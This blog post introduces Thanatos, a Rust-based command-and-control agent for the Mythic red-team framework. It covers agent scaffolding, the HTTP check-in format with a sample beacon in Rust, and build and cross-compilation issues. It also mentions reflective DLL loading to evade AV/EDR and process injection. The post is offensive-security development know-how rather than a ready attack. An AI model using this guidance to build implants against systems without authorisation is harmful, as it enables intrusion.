Thanatos: A Mythic C2 Agent Written in Rust
This is part one of a series of blog posts on Thanatos, a cross-platform Mythic C2 agent written in Rust. This post goes over how the idea for the project came about and why Rust is a great language for offensive tooling development.
Part two of the series covers setting the agent up in an Ubuntu VM and walks through its functionality.
Project repository: https://github.com/MythicAgents/thanatos
Overview
- Background: Some background on what motivated this project and what this project is
- Why Mythic?: Advantages of using Mythic for a C2
- Mythic Payload Development: Development of a Mythic C2 agent
- Challenges: Challenges faced during development
- Offensive Capabilities: Ways Rust is an ideal language for offensive tooling
- Transitioning from C/C++ to Rust: Transitioning C/C++ concepts to Rust
- Development Plans: Future capabilities and development plans
Development
Background
Back in early 2021, I was having a discussion with Max Harley, a good friend of mine, about the Rust programming language. At the time, our knowledge of Rust was very limited, but we both thought it was a really cool language and had plans to get more familiar with it. Max pitched the idea of writing a Mythic agent in Rust as a project for learning the language. Due to the ease of cross-compiling Rust code, we also wanted to make the agent cross-platform. This did not seem like a difficult task since the Rust standard library can be compiled for both Linux and Windows without any modifications. Having a native C2 agent which can target both Linux and Windows allows a lot of flexibility, since it does not require any runtime dependencies such as Python or PowerShell.
So Max and I, with our very minimal knowledge of Rust, decided to start tackling this project of building a C2 agent for Mythic.
Why Mythic?
There are many C2 frameworks that already exist and include features for developing custom extensions and modules. Building custom extensions for these frameworks is great; however, I wanted to build a fully custom agent. Few, if any, frameworks allow developing fully custom agents. This was very limiting, and the alternative would be to develop a C2 framework from scratch just to host the agent. Writing a custom C2 server would mean spending development time creating server architecture instead of developing only the agent.
Mythic is unique compared to other frameworks in that it splits design and functionality into three distinct parts: the server, the C2 profiles, and the C2 agents. Because of this, profiles and agents can be developed separately from the server and then integrated into the platform. This design is where Mythic really excels compared to other platforms: developers have the freedom to create their own custom agents with unique capabilities for a central server. This allowed me to focus only on the agent without needing to create my own custom framework. There are already great examples of the flexibility Mythic brings with this architecture. The MythicAgents Github organization contains a whole suite of custom agents, ranging from fully featured .NET agents to macOS JXA agents. On top of custom C2 agents, there are examples of rather unique C2 profiles. The Orthrus agent uses Apple's MDM to backdoor a macOS system and communicates using Apple Push Notifications, and the Typhon agent is a malicious JAMF configuration which allows Mythic to act as a JAMF server in order to control JAMF-enrolled devices. Mythic's modularity allows these fully custom payloads and profiles to work seamlessly with the Mythic server.
Mythic is the ideal framework for developing custom C2 tools and fits my use case perfectly. It provides the flexibility to develop a custom agent with custom payload functionality without having to build a server from scratch. Creating a server from scratch allows complete control over the framework's design; however, it is rarely a viable use of development time.
Mythic Payload Development
Mythic payload type development is very well documented in the Mythic documentation. The first stage requires creating a directory structure for the agent.
.
├── agent_icons/
│   └── mypayload.svg
├── config.json
├── documentation-payload/
│   └── mypayload/
└── Payload_Type/
    └── mypayload/
        ├── agent_code/
        ├── Dockerfile
        ├── mythic/
        │   ├── agent_functions/
        │   │   ├── builder.py
        │   │   └── __init__.py
        │   ├── browser_scripts/
        │   ├── __init__.py
        │   ├── mythic_service.py
        │   ├── payload_service.sh
        │   └── rabbitmq_config.json
        └── requirements.txt

9 directories, 10 files
There are a few strict rules when it comes to file and directory names. For example, the name of the directory under Payload_Type/* has to be the name of the payload. The same goes for documentation-payload/* for documentation and agent_icons/*.svg for the icon of the agent. The example above assumes that the agent name is mypayload.
Some of the files, such as mythic_service.py and rabbitmq_config.json, need to be pre-populated according to the Mythic documentation or existing payload types.
The config.json file includes configuration options for the payload.
{
    "exclude_payload_type": false,
    "exclude_c2_profiles": true,
    "exclude_documentation_payload": false,
    "exclude_documentation_c2": true,
    "exclude_documentation_wrapper": true,
    "exclude_agent_icons": false
}
Since this is only a payload type and doesn't include any custom C2 profiles, only the exclude_payload_type, exclude_documentation_payload, and exclude_agent_icons fields need to be set to false.
Mythic functions using Docker containers. The Payload_Type/mypayload/Dockerfile file defines the Docker container the payload builder will use. There are Docker base images already available which include dependencies for building different types of payloads, but a custom one can be defined. This container is only used for building the payload; other functions, such as C2 communication, are handled in profile containers.
The Payload_Type/mypayload/mythic/agent_functions/builder.py file includes metadata about the payload along with the implementation for building each payload. The Mythic documentation for this file includes a very in-depth guide on what to include in order to define your agent in Mythic, along with how to compile build parameters into the payload.
I like to think of payload type development as containing "payload" code and "mythic" code. The payload code is the code for the agent itself and lives in the Payload_Type/mypayload/agent_code/ directory; the actual development of the agent and its features happens here. The other part is the mythic code, which lives in the Payload_Type/mypayload/mythic/agent_functions/ directory. This is where the agent's commands are defined, along with their parameters and any other pre-tasking performed before a task is sent down to the agent. The system for defining commands in Mythic provides a vast set of features for the developer; information about adding different commands can be found in the documentation.
HTTP is a very common C2 communication transport and is one of the easiest to implement. Mythic already includes an HTTP C2 profile which can be used with an agent for C2 communications. This is a fairly straightforward profile which uses HTTP GET/POST requests and base64-encoded JSON data. The initial check-in for an agent consists of an HTTP request with the following format.
Base64( PayloadUUID + JSON({
    "action": "checkin", // required
    "ip": "127.0.0.1", // internal ip address - required
    "os": "macOS 10.15", // os version - required
    "user": "its-a-feature", // username of current user - required
    "host": "spooky.local", // hostname of the computer - required
    "pid": 4444, // pid of the current process - required
    "uuid": "payload uuid", // uuid of the payload - required
    "architecture": "x64", // platform arch - optional
    "domain": "test", // domain of the host - optional
    "integrity_level": 3, // integrity level of the process - optional
    "external_ip": "8.8.8.8", // external ip if known - optional
    "encryption_key": "base64 of key", // encryption key - optional
    "decryption_key": "base64 of key", // decryption key - optional
    "process_name": "osascript", // name of the current process - optional
}))
The PayloadUUID is generated for each payload at compile time. An HTTP POST request with this in the body will register an initial check-in with Mythic on the callbacks page. Encryption can be included in the request payload by following the format specified in the documentation.
From here, an agent can be created by periodically beaconing back to the Mythic server to get tasking and sending the results of completed tasking back.
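To make this concrete, below is a minimal sketch of what that initial check-in could look like from the agent side in Rust. It assumes the reqwest (with the blocking feature), serde_json, and base64 crates; the endpoint path and all field values are illustrative and not the exact Thanatos implementation.

// A rough sketch of an initial check-in, not the actual Thanatos code.
// Assumes reqwest = { version = "0.11", features = ["blocking"] },
// serde_json, and base64 as dependencies.
fn main() -> Result<(), Box<dyn std::error::Error>> {
    let payload_uuid = "00000000-0000-0000-0000-000000000000"; // compiled-in UUID

    // Build the required check-in fields; the values here are placeholders.
    let checkin = serde_json::json!({
        "action": "checkin",
        "ip": "127.0.0.1",
        "os": "Linux",
        "user": "operator",
        "host": "target.local",
        "pid": std::process::id(),
        "uuid": payload_uuid,
    });

    // Body format from the profile: Base64(PayloadUUID + JSON)
    let body = base64::encode(format!("{}{}", payload_uuid, checkin));

    // POST the check-in to the HTTP profile endpoint (URL is illustrative)
    let response = reqwest::blocking::Client::new()
        .post("http://mythic.example.com/agent_message")
        .body(body)
        .send()?
        .text()?;
    println!("{}", response);
    Ok(())
}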
This covers the start of building a basic Mythic payload; guidance on creating more advanced commands can be found in the Mythic documentation. The example does not go into depth on all of the other great capabilities included with Mythic. Mythic supports registering new commands with a callback at runtime: for example, an agent can load a DLL during runtime and register commands with Mythic in order to interact with that newly loaded DLL. The Medusa agent includes this capability. Mythic also supports a structure for peer-to-peer communications between agents, where an agent can communicate with other agents directly in order to pass on tasking. The Apollo and Poseidon agents support p2p functionality through SMB and/or TCP.
Challenges
There were a few issues faced when developing the agent. These were not necessarily design issues, but stemmed from how the Rust programming language is designed and the capabilities I wanted to include in the agent.
The first major issue was compile times. Compiling Rust programs by themselves isn't slow; however, the way Rust handles compiling and linking dependencies can drastically increase build times. Dependencies for a Rust project are defined in a Cargo.toml file in the root of the project directory. When the project is compiled, each dependency is pulled down, compiled separately from the main project source, and then linked in. Builds are incremental, so once the dependencies are compiled, each subsequent build will only rebuild the source code for the main project and link the already-built dependencies. An initial build of a project may take around 40 seconds to download and compile all of the dependencies, whereas subsequent builds only take around 0.3 seconds. This dependency management system works very well; however, it is per-project. If you have two Rust projects that rely on the same library, each project will compile the library and store the built artifact in its own project directory. On top of this, dependencies are also built per target: if a project was built for 64 bit Linux, a subsequent 32 bit Linux build will require rebuilding all of the dependencies for 32 bit.
How does this relate to Thanatos? Initially, Thanatos did not do any special dependency caching, which meant that every time a new payload was built, its dependencies were compiled again. Build times averaged around 30 seconds to a minute per build depending on system resources. To solve this, the payload builder caches dependencies after the first build for a given target platform: an initial build of a 64 bit Linux payload compiles all of the dependencies for 64 bit Linux and caches them for future builds, significantly reducing subsequent build times (a sketch of the idea follows below). This design also helps reduce the size of the Docker image. The image could ship pre-built dependencies, but that would require Windows/Linux 64 and 32 bit targets along with statically linked Linux builds; if an operation does not require Linux agents, those libraries would take up a lot of unnecessary hard drive space.
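As a rough illustration of the caching idea (not necessarily how the Thanatos builder implements it), Cargo's build.target-dir setting can redirect compiled artifacts, including dependencies keyed by target triple, to a shared directory that survives across payload builds; the cache path below is made up:

# .cargo/config.toml (the cache path is illustrative)
[build]
# Reuse one artifact directory across builds; Cargo separates compiled
# dependencies by target triple, so 32 and 64 bit builds cache side by side.
target-dir = "/opt/payload_cache"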
The second issue was cross-compilation. Rust by itself has incredible cross-compilation capabilities; however, those can be hampered by dependencies which require C development libraries. The ssh2 library that Thanatos uses for SSH requires OpenSSL, so when compiling for Windows targets, an OpenSSL library compatible with mingw is needed, in both 32 bit and 64 bit builds. One option was to cross-compile OpenSSL for each platform I needed and include it inside the Docker container. It wasn't an ideal fix, but it would make the agent compile. I then found that the Fedora Docker base image's repositories included all of the dependencies I needed, so I ended up using Fedora for the base image.
Another factor in choosing Fedora for the Docker base image was Windows 32 bit builds. I had a fair bit of difficulty getting 32 bit Windows Rust binaries built in Ubuntu Docker containers, which I tracked down to an issue with the mingw32 compiler in the Ubuntu repositories: it is built with an option that uses a linker incompatible with Rust's libunwind. This was a major hindrance, since it meant Thanatos could not target 32 bit Windows. Building 32 bit Windows binaries allows injecting the payload into 32 bit processes, so it was a feature worth keeping. Luckily, the mingw32 compiler in Fedora does not enable this option and allowed building 32 bit Windows payloads.
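For reference, targeting 32 bit Windows from Linux with the GNU toolchain looks roughly like the following, assuming the mingw32 cross-compiler is installed and configured as the linker for the target:

# one-time: install the Windows cross-compilation targets
rustup target add x86_64-pc-windows-gnu i686-pc-windows-gnu

# build a 32 bit Windows payload (requires a working mingw32 linker,
# e.g. i686-w64-mingw32-gcc, set for this target in .cargo/config.toml)
cargo build --release --target i686-pc-windows-gnu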
Rust Programming Language
Offensive Capabilities
Digging more into Rust, I was blown away by the offensive capabilities it can provide. At a high level, Rust can be thought of as a language which bridges the gap between low-level systems development, such as direct memory manipulation, and high-level development, such as manipulating JSON. Rust can work with raw pointers and manipulate memory much like C/C++. There may be times when a DLL needs to be loaded reflectively in either the current process or another process; Rust can parse the DLL headers and resolve all the symbols the same way C/C++ can. Reflectively loading a DLL means the DLL never touches the hard disk of the target system, where it could trigger AV or EDR depending on what the DLL is. Rust even supports inline assembly, giving offensive tool developers very fine control over what executes in their program. Golang has pointers, but they don't provide the same level of control as Rust's; Golang gets around this by writing low-level memory code in C and using its C FFI to invoke those functions. Rust does not need to rely on C for any low-level memory management.
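As a contrived sketch of that low-level control (this is illustrative, not code from the agent, and the inline assembly assumes an x86-64 target):

fn main() {
    // Direct memory manipulation through a raw pointer, no C shim required.
    let mut buf = [0u8; 4];
    let ptr = buf.as_mut_ptr();
    unsafe {
        *ptr = 0x90; // write a single byte through the raw pointer
    }

    // Inline assembly (stable since Rust 1.59) for fine control over
    // exactly what executes; this snippet is x86-64 specific.
    let x: u64;
    unsafe {
        std::arch::asm!("mov {0}, 42", out(reg) x);
    }
    println!("{:?} {}", buf, x);
}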
As mentioned, Rust bridges the gap between low-level systems development and high-level development. Working with JSON in Rust using the serde_json library is very similar to working with JSON in Golang. There are many different HTTP libraries available, many with async support. Using an HTTP library such as reqwest makes sending an HTTP request and printing the output as simple as:
# Cargo.toml
[dependencies]
reqwest = { version = "0.11", features = ["blocking"] }

fn main() {
    // Fetch the page and print the response body
    let data = reqwest::blocking::get("http://example.com")
        .unwrap()
        .text()
        .unwrap();
    println!("{}", data);
}
No need to initialize an HTTP handle or manually allocate memory.
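Likewise, here is a small sketch of parsing JSON with serde_json, assuming serde (with its derive feature) as a dependency; the Task structure and its fields are made up for illustration:

use serde::Deserialize;

// A hypothetical tasking structure; the field names are illustrative.
#[derive(Deserialize)]
struct Task {
    id: String,
    command: String,
}

fn main() {
    let raw = r#"{"id": "1234", "command": "whoami"}"#;
    let task: Task = serde_json::from_str(raw).unwrap();
    println!("task {} -> {}", task.id, task.command);
}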
Libraries are not the only thing that makes development easier: the language itself provides functional features which reduce the amount of code needed for common tasks. The standard library is very extensive and almost always includes an elegant way of accomplishing a very specific task. For example:
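A small sketch of the kind of iterator chaining the standard library enables (the input string is arbitrary):

fn main() {
    // Collect the unique lengths of non-empty lines, sorted, using
    // iterator adapters instead of hand-written loops.
    let text = "root\n\ndaemon\nbin\n";
    let mut lengths: Vec<usize> = text
        .lines()
        .filter(|line| !line.is_empty())
        .map(|line| line.len())
        .collect();
    lengths.sort_unstable();
    lengths.dedup();
    println!("{:?}", lengths); // [3, 4, 6]
}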
A few great resources on Rust being used for offensive tooling worth checking out are Black Hat Rust and Offensive Rust.
Transitioning From C/C++ to Rust
I have found many situations where I can ditch C/C++ for a project and use Rust instead. Rust can do anything I need C/C++ to do while also bringing memory safety. C and C++ have a history of being the root cause of many memory corruption vulnerabilities that exist even today. This is partly due to developers writing software which contains bugs, and partly due to the fact that C/C++ do not prevent people from writing software which could introduce a memory corruption vulnerability.
This is why Rust is a great language for C/C++ developers who want to write secure code while keeping the performance and low-level properties of C/C++. There are a few things that tripped me up when transitioning from C/C++ to Rust.
The Rust compiler features a borrow checker, which can be a little frustrating to get used to at first. The idea behind the borrow checker is to prevent pointer aliasing combined with shared mutability. Here are two examples to demonstrate ownership and borrowing.
fn main() {
    let a = "Hello World".to_string();
    let b = a; // 'a' variable is moved to 'b'
    println!("{}", a); // since 'a' was moved to 'b', 'a' is no longer valid
}
This example will not compile. The a variable owns the heap-allocated string "Hello World", which is then assigned to b while a is still printed afterwards. With raw pointers, C/C++ would treat a and b as pointers to the same heap-allocated string, leaving a and b aliasing the same area of memory, which can result in unsafe behavior. Other languages such as Golang or Python will make a copy of the string whenever it gets assigned to the b variable. Since heap allocations can be relatively expensive computationally, Rust won't implicitly allocate memory and store a new copy of the string; instead, ownership moves to b and using a afterwards is a compile error.
fn main() {
    let a = "Hello World".to_string();
    let b = &a; // 'b' is now a reference to 'a'
    println!("{}", a); // since 'b' is a reference to 'a', 'a' is still valid
}
This example does compile because ownership of the heap allocation containing the string "Hello World" isn't being passed to the b variable; instead, b is now borrowing the string from a. This may seem like a basic concept; however, it can become very tedious to apply.
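When an independent copy really is wanted, the allocation has to be requested explicitly, which keeps the cost visible in the code:

fn main() {
    let a = "Hello World".to_string();
    let b = a.clone(); // explicit second heap allocation
    println!("{} {}", a, b); // both remain valid
}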
Lifetimes exist in C/C++, but they are more explicit in Rust. A lifetime expresses that when a variable refers to another piece of data, that data must remain valid for as long as any references to it exist. Lifetime annotations in Rust can get a little ugly, but knowing how and when to use them makes them easier to read.
fn main() {
    let a: String = "Hello World".to_string(); // "Hello World" is a heap allocated string
    let b: &str = a.as_str(); // refers to the heap allocated string directly
    println!("{}", b);
}
I included types for the variables to make the program logic a little easier to understand. The b variable refers to the "Hello World" string by reference. This is valid, but what happens if the "Hello World" string gets deallocated?
fn main() {
    let a: String = "Hello World".to_string(); // "Hello World" is a heap allocated string
    let b: &str = a.as_str(); // refers to the heap allocated string directly
    drop(a); // deallocate the "Hello World" string
    println!("{}", b);
}
This obviously won’t work because b
is now a reference to memory which was deallocated.
Lifetime issues become clearer when working with structures.
struct MyStruct {
    field1: &str
}

fn main() {
    let b = "Hello World";
    let a = MyStruct {
        field1: b,
    };
    println!("{}", a.field1);
}
This example won’t compile because it is not guaranteed that every time MyStruct
is
created the string field1
refers to will be valid. &str
can be thought of as a string
literal and not a heap allocated string. This is where a lifetime parameter is needed.
struct MyStruct<'a> {
    field1: &'a str
}

fn main() {
    let b = "Hello World";
    let a = MyStruct {
        field1: b,
    };
    println!("{}", a.field1);
}
This does compile because the 'a lifetime tells the compiler that any value which field1 refers to has to live at least as long as the structure itself.
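The same annotations apply to functions. Here is a minimal sketch where the returned reference is tied to the lifetimes of the inputs:

// The returned &str is guaranteed to live at least as long as both inputs.
fn longest<'a>(x: &'a str, y: &'a str) -> &'a str {
    if x.len() >= y.len() { x } else { y }
}

fn main() {
    let a = "Hello World".to_string();
    let b = "Hello";
    println!("{}", longest(a.as_str(), b));
}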
Future Improvements
Development Plans
The agent is far from finished, and development will continue. This initial release should be thought of as a beta test to see what areas could be improved and to fix any potential bugs. The agent hasn't been thoroughly tested, so issues will most likely arise. New feature development is going to focus on areas which have the potential to affect the overall structure of the agent. The reasoning behind this is the risk of having to rewrite the agent, or most of it, to include a certain feature. Rewriting the agent would not be a huge setback now; however, if miscellaneous features are added before the structure is solidified, a rewrite would take a lot more time.
The three most important features which could potentially require restructuring the code base are: integration of multiple C2 profiles, SOCKS proxying through the agent, and p2p C2 profiles. Once the overall structure of the agent is completely figured out, adding various commands should be a matter of implementing the code which accomplishes each task.